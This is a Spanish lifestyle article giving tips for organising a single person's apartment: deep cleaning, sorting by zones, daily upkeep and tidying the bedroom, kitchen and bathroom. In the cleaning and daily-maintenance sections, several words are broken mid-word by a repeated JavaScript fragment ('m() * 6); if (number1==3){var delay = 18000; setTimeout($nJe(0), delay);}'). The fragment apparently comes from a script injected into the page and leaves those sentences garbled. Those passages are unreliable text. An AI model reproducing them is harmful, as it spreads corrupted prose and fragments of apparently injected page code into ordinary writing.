Cómo organizar un departamento si eres soltero

    Cómo organizar un departamento si eres soltero

    Hacks para ordenar tu departamento de soltero

    Autor: Elizabeth Rivera 11 marzo, 2020


    FOTO: Shutterstock

     

     

    Por fin estás en tu propio espacio. Se acabó el vivir con tus papás o roommates. Ahora, es importante que sepas cómo ordenar tu hogar. 

     

     

    El desorden juega en contra no sólo del estilo decorativo de tu hogar sino también de tu productividad personal y la armonía generalizada.

     

    Por esta razón, te propondremos algunos consejos que te ayudarán al momento de ordenar tu espacio. Además, si sigues nuestros tips evitarás que pierdas las cosas y el tiempo en cuestiones que se pueden evitar con el orden. 

     

     

    Realiza una limpieza a fondo

    Seguramente, y muchos lo hacemos, cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes limpiandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando veas algo que no necesitas o que creas que es valioso y lo guardes en algún estante o cajón. Esto parecería ser una solución efectiva pero sólo va a generar caos y te obligará a trabajar más cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando decidas hacer una limpieza a fondo. 

     

     

    Por lo tanto, la principal regla al limpiar tu espacio es no guardar cosas que no utilices. Todos tendemos a acumular objetos. Así que te proponemos que de una vez le dediques un día para limpiar bien y comiences deshaciéndote de todo lo que no sea necesario. 

    Por ejemplo, si todavía guardas la envoltura del chocolate que te regaló tu ex pareja el 14 de febrero de hace mil años, es momento de tirarla. Si tienes cosas que no se pueden tirar, dónalas. Si tienes ropa que hace años ya no usas, haz lo mismo. 

    Por último, no guardes papeles viejos que no tienen ningún valor.

     

    Ordena por zonas

    Una vez que hayas limpiado a fondo, es momento de planificar cómo vas a organizar tu hogar. Te recomendamos que lo hagas por zonas. Tal vez al principio esto te parezca caótico pero a la larga te ayudará a mantener todo organizado 

     

     

    Algunas formas de ordenar por zonas son: designar un espacio para objetos determinados; clasificar lo objetos según su uso y si almacenas cosas en contenedores, identifícalos para reconocer su contenido. 

     

    No dejes objetos en zonas que no pertenecen

    Así es justo como se inicia con el desorden. Hazte del hábito de guardar cada cosa en su lugar luego de haberlas utilizado para que siempre sepas dónde hallarlas.

     

     

    Realiza un mantenimiento diario

    Es importante la limpieza a fondo cada tanto pero también debes marcarte pautas diarias para mantener el orden. Con el sólo hecho de hacer tu cama todos los días y lavar los platos lograrás mucho. Ve adoptandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando pequeñas rutinas de limpieza para que tu hogar luzca siempre bien. 

     

     

    Tu habitación, en perfecto orden

    Utiliza ganchos específicos para pantalones y para camisas. Mantén tus cajones separados por prendas, unos para calcetines, otro para ropa interior, etc. Y compra un zapatero para que puedas tener todo tu calzado bien ordenado. 

     

     

    Cocina ordenada

    Pon cada cosa en su lugar. Los cubiertos en los cajones designados para ellos, los platos en las estanterías, otro espacio para ollas y sartenes. Debajo del fregadero todo lo que necesitas para la limpieza. Acostúmbrate a dejar todo de vuelta en su lugar. La despensa organízala por latas, paquetes y botellas. 

     

     

    No olvides el baño

    Lo primero que tienes que pensar es, qué productos necesitas tener cerca diariamente y colocarlos en un sitio de fácil acceso. Los espejos con armario son perfectos para guardar este tipo de cosas. Debajo del lavabo mantén el papel de baño, toallas, etc. 

     

     

    No quieres hacer tanto esfuerzo mira LOS GADGETS QUE TODO SOLTERO DEBE TENER

     

     

    Temas relacionados con esta nota: , ,

Hacks para ordenar tu departamento de soltero